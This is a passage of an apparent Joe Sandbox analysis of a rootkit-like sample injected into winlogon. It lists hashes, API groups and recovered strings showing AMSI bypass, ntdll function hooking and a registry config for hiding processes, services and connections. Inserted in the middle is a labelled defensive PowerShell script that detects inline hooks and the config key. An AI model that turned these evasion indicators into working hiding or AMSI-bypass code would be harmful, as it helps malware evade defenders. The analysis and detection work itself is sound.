                                                  • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                  • Instruction Fuzzy Hash: 1AA1E633B4478889FB22DB759440BED7BA0BB8179CF9881199E5527A95CA3BC043C7C3
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFile$FirstNext
                                                  • String ID:
                                                  • API String ID: 1164774033-0
                                                  • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                  • Instruction ID: bca9c8bf826c505011b38fd6b5f6bfe9104125b42424f6945c05f756906d2787
                                                  • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                  • Instruction Fuzzy Hash: C8A10633B4478849FB229B75E440BED7BA0BB81B9DF9C4115DA492BA95DA36C041C343
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                  • String ID:
                                                  • API String ID: 2933794660-0
                                                  • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                  • Instruction ID: 2ffd8be48935f38640984e0e891f6a1c018a3ddb3dfbf4d3b2fca621978af583
                                                  • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                  • Instruction Fuzzy Hash: 14113C36B51F088AFB00CF60E8547E833A4FB59758F840E21DA6D86BA4EF78C1558382
                                                  APIs
                                                    • Part of subcall function 000001CA7D29D220: HeapAlloc.KERNEL32(?,?,00000000,000001CA7D29C987), ref: 000001CA7D29D275
                                                    • Part of subcall function 000001CA7D2A0EB8: _invalid_parameter_noinfo.LIBCMT ref: 000001CA7D2A0EEB
                                                  • FindFirstFileExW.KERNEL32 ref: 000001CA7D29DB99
                                                    • Part of subcall function 000001CA7D29D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000001CA7D29674A), ref: 000001CA7D29D2B6
                                                    • Part of subcall function 000001CA7D29D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000001CA7D29674A), ref: 000001CA7D29D2C0
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocErrorFileFindFirstFreeLast_invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 2436724071-0
                                                  • Opcode ID: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                                                  • Instruction ID: 3ea8621b35377627fdacd7b1a3c1b8087c9e356d7a72d09c49ba8589577fb77f
                                                  • Opcode Fuzzy Hash: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                                                  • Instruction Fuzzy Hash: B8813533B4478485FB22DB31A544BDEB791FB847A9F884125AE9D27795CE3AC04393C2
                                                  APIs
                                                    • Part of subcall function 000001CA7D21D220: HeapAlloc.KERNEL32(?,?,00000000,000001CA7D21C987), ref: 000001CA7D21D275
                                                    • Part of subcall function 000001CA7D220EB8: _invalid_parameter_noinfo.LIBCMT ref: 000001CA7D220EEB
                                                  • FindFirstFileExW.KERNEL32 ref: 000001CA7D21DB99
                                                    • Part of subcall function 000001CA7D21D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000001CA7D21674A), ref: 000001CA7D21D2B6
                                                    • Part of subcall function 000001CA7D21D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000001CA7D21674A), ref: 000001CA7D21D2C0
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocErrorFileFindFirstFreeLast_invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 2436724071-0
                                                  • Opcode ID: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                                                  • Instruction ID: 176bc6c17da58cb777e97b847668772cea4fa243f14036d6c43020da7c5fc00a
                                                  • Opcode Fuzzy Hash: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                                                  • Instruction Fuzzy Hash: C181E733B44788C5FB22DB21A550BDE7791FB447D8F888119AEA907B95DA3BC04387C2
                                                  APIs
                                                    • Part of subcall function 000001CA7D1ED220: HeapAlloc.KERNEL32(?,?,00000000,000001CA7D1EC987), ref: 000001CA7D1ED275
                                                    • Part of subcall function 000001CA7D1F0EB8: _invalid_parameter_noinfo.LIBCMT ref: 000001CA7D1F0EEB
                                                  • FindFirstFileExW.KERNEL32 ref: 000001CA7D1EDB99
                                                    • Part of subcall function 000001CA7D1ED2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000001CA7D1E674A), ref: 000001CA7D1ED2B6
                                                    • Part of subcall function 000001CA7D1ED2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000001CA7D1E674A), ref: 000001CA7D1ED2C0
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocErrorFileFindFirstFreeLast_invalid_parameter_noinfo
                                                  • String ID:
                                                  • API String ID: 2436724071-0
                                                  • Opcode ID: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                                                  • Instruction ID: 5205a7403cca9f1548dad89f04e5f688a0c075462e664ab97e36f28573c5fae2
                                                  • Opcode Fuzzy Hash: 015d5b419df91353723227b82cc5f20b2d7cfca631414c8aa69de49a3ee2378e
                                                  • Instruction Fuzzy Hash: 5A81F733B4478485FB22DB22E440BDEB791FB85B99F8C4125AE99077D5DE3AC1418743
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000003.1645690785.000001CA7D1B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001CA7D1B0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_3_1ca7d1b0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c9bdd77244afecc035c9c3357dde6af93eede52a42cb897eb52dd6107e5c9c51
                                                  • Instruction ID: ca34dd41252b53d4a5cff9c5e57dc41cb2ffb1eb775b14f4f42dfe15e54293e6
                                                  • Opcode Fuzzy Hash: c9bdd77244afecc035c9c3357dde6af93eede52a42cb897eb52dd6107e5c9c51
                                                  • Instruction Fuzzy Hash: 541156B3A987D88BF75A9F6994517993790BB0438CFC48069D44986A94C73EC4D04F52
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                  • String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                  • API String ID: 2135414181-3572789727
                                                  • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                  • Instruction ID: fb15fa20126c4c6dafad04b3a9e0ce3b22ed315104faccb0dcb3aec83ba8768e
                                                  • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                  • Instruction Fuzzy Hash: 7371F837B50B5889FB129F26E850A9A33A4FF88B8DF801112DD4D57B68DE26C446C3D2
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                  • String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                  • API String ID: 2135414181-3572789727
                                                  • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                  • Instruction ID: 2c83494e5a43262cfe800e831b7ec8651a9dabb613aca94f4580080f8d60cd14
                                                  • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                  • Instruction Fuzzy Hash: CD711737B50B1985FB229F21E850AD833A4FF88B8CF819115ED4D47A28DE3AC546C3C6
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                                  • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                  • API String ID: 1735320900-4225371247
                                                  • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                  • Instruction ID: 68f115bde263472201ca07a53b25cff465ad2114566305ba7983a19ab3ffb222
                                                  • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                  • Instruction Fuzzy Hash: FA516176E90B4EA5FB039B64E840EE53361FF8434DFC14512980926675AE7AC25BC3E3
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                                  • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                  • API String ID: 1735320900-4225371247
                                                  • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                  • Instruction ID: c27b5b2766e8a714269c9b7251a9534395d3fbc0594a058b2d3d4c984f6c3e2e
                                                  • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                  • Instruction Fuzzy Hash: 47517A72A90B0EA5FB039B68E842ED83324BF4475CFC18916A40902575DE7BD25BC3E7
                                                  APIs
                                                  Strings
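The two similarity blocks above name what this sample resolves at run time: the registry strings SOFTWARE\, nya-config and the value names paths, pid, process_names, service_names, startup, tcp_local, tcp_remote and udp (a hidden-object configuration), and the exports AmsiScanBuffer, the Nt* directory, key and system-information routines in ntdll.dll, the service-enumeration functions in advapi32.dll and sechost.dll, and the PDH counter-array functions. The PowerShell below is an added triage check, not part of the Joe Sandbox report and not code from the sample: it reads the first 16 bytes of each named export in the running process and flags common trampoline patterns (jmp rel32, jmp [rip+disp32], mov rax,imm64 / jmp rax) and, for the ntdll Nt* stubs, a missing x64 syscall prologue; it then looks for the configuration key. Assumptions: 64-bit Windows 10/11 with a 64-bit PowerShell host; the configuration key lives under HKLM\SOFTWARE and is named either $nya-config or nya-config (Joe Sandbox uses $ as the separator in its string lists, so the exact name cannot be read off the report); the service functions are probed in both modules, and an "export not found" result is expected for one of them.

```powershell
# Added triage check (not from the Joe Sandbox report or the sample).
# Assumes 64-bit Windows 10/11 and a 64-bit PowerShell host.
$src = @'
using System;
using System.Runtime.InteropServices;
public static class Native {
    [DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
    public static extern IntPtr LoadLibraryW(string name);
    [DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)]
    public static extern IntPtr GetProcAddress(IntPtr module, string name);
}
'@
Add-Type -TypeDefinition $src

# module!export pairs taken from the sample's string table; the service-enumeration
# functions are probed in both advapi32.dll and sechost.dll (a miss in one is expected).
$targets = @(
    'ntdll.dll!NtDeviceIoControlFile', 'ntdll.dll!NtEnumerateKey', 'ntdll.dll!NtEnumerateValueKey',
    'ntdll.dll!NtQueryDirectoryFile', 'ntdll.dll!NtQueryDirectoryFileEx',
    'ntdll.dll!NtQuerySystemInformation', 'ntdll.dll!NtResumeThread',
    'amsi.dll!AmsiScanBuffer',
    'advapi32.dll!EnumServiceGroupW', 'advapi32.dll!EnumServicesStatusExW',
    'sechost.dll!EnumServiceGroupW',  'sechost.dll!EnumServicesStatusExW',
    'pdh.dll!PdhGetFormattedCounterArrayW', 'pdh.dll!PdhGetRawCounterArrayW'
)

function Test-InlineHook {
    param([string]$Module, [string]$Export)
    $result = [ordered]@{ Module = $Module; Export = $Export; Address = ''; Bytes = ''; Status = '' }
    $h = [Native]::LoadLibraryW($Module)
    if ($h -eq [IntPtr]::Zero) { $result.Status = 'module not available'; return [pscustomobject]$result }
    $p = [Native]::GetProcAddress($h, $Export)
    if ($p -eq [IntPtr]::Zero) { $result.Status = 'export not found'; return [pscustomobject]$result }
    $b = New-Object byte[] 16
    [Runtime.InteropServices.Marshal]::Copy($p, $b, 0, 16)   # plain read of our own address space
    $result.Address = '0x{0:X}' -f $p.ToInt64()
    $result.Bytes   = ($b | ForEach-Object { $_.ToString('X2') }) -join ' '
    # Trampolines a user-mode hook engine typically writes over the entry point, then the
    # x64 Nt* syscall stub prologue "mov r10,rcx; mov eax,<ssn>" = 4C 8B D1 B8 (Windows 10/11 layout, assumption).
    if     ($b[0] -eq 0xE9)                     { $result.Status = 'SUSPICIOUS: jmp rel32 at entry' }
    elseif ($b[0] -eq 0xFF -and $b[1] -eq 0x25) { $result.Status = 'SUSPICIOUS: jmp [rip+disp32] at entry' }
    elseif ($b[0] -eq 0x48 -and $b[1] -eq 0xB8 -and $b[10] -eq 0xFF -and $b[11] -eq 0xE0) {
        $result.Status = 'SUSPICIOUS: mov rax,imm64 / jmp rax at entry'
    }
    elseif ($Module -eq 'ntdll.dll' -and $Export -like 'Nt*' -and
            -not ($b[0] -eq 0x4C -and $b[1] -eq 0x8B -and $b[2] -eq 0xD1 -and $b[3] -eq 0xB8)) {
        $result.Status = 'SUSPICIOUS: syscall stub prologue missing'
    }
    else { $result.Status = 'clean prologue' }
    [pscustomobject]$result
}

function Test-ConfigKey {
    # Hive and exact key name are assumptions; the report shows only "SOFTWARE\" and "nya-config".
    foreach ($name in '$nya-config', 'nya-config') {
        $key = "HKLM:\SOFTWARE\$name"
        if (Test-Path -LiteralPath $key) {
            # the value names from the string table (paths, pid, process_names, ...) are expected
            # either as values of this key or as subkeys holding values; list both
            $props = Get-ItemProperty -LiteralPath $key
            foreach ($p in ($props.PSObject.Properties | Where-Object { $_.Name -notlike 'PS*' })) {
                [pscustomobject]@{ Key = $key; SubKey = ''; Name = $p.Name; Data = $p.Value }
            }
            foreach ($sub in Get-ChildItem -LiteralPath $key) {
                $sp = Get-ItemProperty -LiteralPath $sub.PSPath
                foreach ($p in ($sp.PSObject.Properties | Where-Object { $_.Name -notlike 'PS*' })) {
                    [pscustomobject]@{ Key = $key; SubKey = $sub.PSChildName; Name = $p.Name; Data = $p.Value }
                }
            }
        }
    }
}

$hooks = foreach ($t in $targets) { $m, $e = $t -split '!'; Test-InlineHook -Module $m -Export $e }
$hooks | Format-Table -AutoSize
$cfg = @(Test-ConfigKey)
if ($cfg.Count) { $cfg | Format-Table -AutoSize } else { 'No configuration key found under HKLM\SOFTWARE.' }
```

Run it from a 64-bit host on the suspect machine; because the sample injects into running processes, a hooked PowerShell process will show the trampoline in its own ntdll.dll copy, which is what the check relies on. A trampoline only proves that something patched the export: EDR agents install legitimate inline hooks on several of the same ntdll functions, so compare the byte patterns against a clean host with the same security stack before concluding the hook belongs to this sample. The prologue test does not apply under a 32-bit (WoW64) host, where the syscall stubs look different.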
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                  • String ID: d
                                                  • API String ID: 2005889112-2564639436
                                                  • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                  • Instruction ID: 7a9e4dd526ab2a344e9bcf59a507826a2bcd43945c5cf18051587018948a7a67
                                                  • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                  • Instruction Fuzzy Hash: 34513E33A50B889AE716CF62E4447AB77A1FBC8F99F844124DE4907758DF3DC04A8782
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                  • String ID: d
                                                  • API String ID: 2005889112-2564639436
                                                  • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                  • Instruction ID: 10435c65013aa49502dc7abc10a9fb8f475a20879a614cbceb8abb604b999947
                                                  • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                  • Instruction Fuzzy Hash: E5516033A50B8896F722CF62E44979A77A1FB88F98F858124DE4907718DF3DD046C782
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3350459570.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000000F.00000002.3349704091.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3351334888.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352170833.000001CA7D200000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3352963856.000001CA7D202000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3353741849.000001CA7D209000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                  • String ID: d
                                                  • API String ID: 2005889112-2564639436
                                                  • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                  • Instruction ID: c1dc221c099710ed114a4203ff786129722ca6648603eb70c6731709578373a2
                                                  • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                  • Instruction Fuzzy Hash: 7151C073A45B8886F721CF62E41879A77A1FB88F89F844124DE4A03758DF3DC145C782
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3360858425.000001CA7D291000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D290000, based on PE: true
                                                  • Associated: 0000000F.00000002.3360109586.000001CA7D290000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3361714879.000001CA7D2A5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3362434977.000001CA7D2B0000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3363247667.000001CA7D2B2000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3363997537.000001CA7D2B9000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d290000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                                  • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                                  • API String ID: 740688525-1880043860
                                                  • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                  • Instruction ID: 35e59fce39fc26d4e588c545ceda4915201235a0509f46c42b5d2ee77a2c5ca4
                                                  • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                  • Instruction Fuzzy Hash: 97519C33B4171851FA569B56A800BE632A0BF88BB9F9807259E39173D4DF3AD40686C3
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3355102486.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000000F.00000002.3354407705.000001CA7D210000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3355894210.000001CA7D225000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3356681840.000001CA7D230000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3357412344.000001CA7D232000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 0000000F.00000002.3358060672.000001CA7D239000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
